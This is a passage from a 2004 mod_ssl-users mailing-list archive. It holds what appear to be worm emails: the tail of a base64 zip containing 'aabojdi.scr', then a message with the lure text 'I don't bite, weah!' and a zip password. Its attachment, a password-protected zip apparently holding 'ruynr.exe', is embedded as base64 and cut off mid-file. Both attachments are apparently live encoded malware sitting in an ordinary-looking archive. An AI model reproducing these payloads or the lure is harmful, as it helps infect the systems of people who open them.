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

----------upwsyjxrhjkmhjtbxxjx--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 15 01:33:32 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C99AAA89B8; Mon, 15 Mar 2004 01:33:32 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from Slo8ballCJ (user-0c99bkh.cable.mindspring.com [24.148.174.145])
	by master.modssl.org (Postfix) with SMTP id 34ACBA8939
	for ; Mon, 15 Mar 2004 01:33:31 +0100 (CET)
Date: Sun, 14 Mar 2004 19:33:28 -0500
To: modssl-users@modssl.org
Subject: ^_^ meay-meay!
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------akfodbxreuishyndclqu"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------akfodbxreuishyndclqu
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

 I  don't  bite, weah!

..btw, "37440"  is a password  for archive

----------akfodbxreuishyndclqu
Content-Type: application/octet-stream; name="AttachedFile.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="AttachedFile.zip"

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
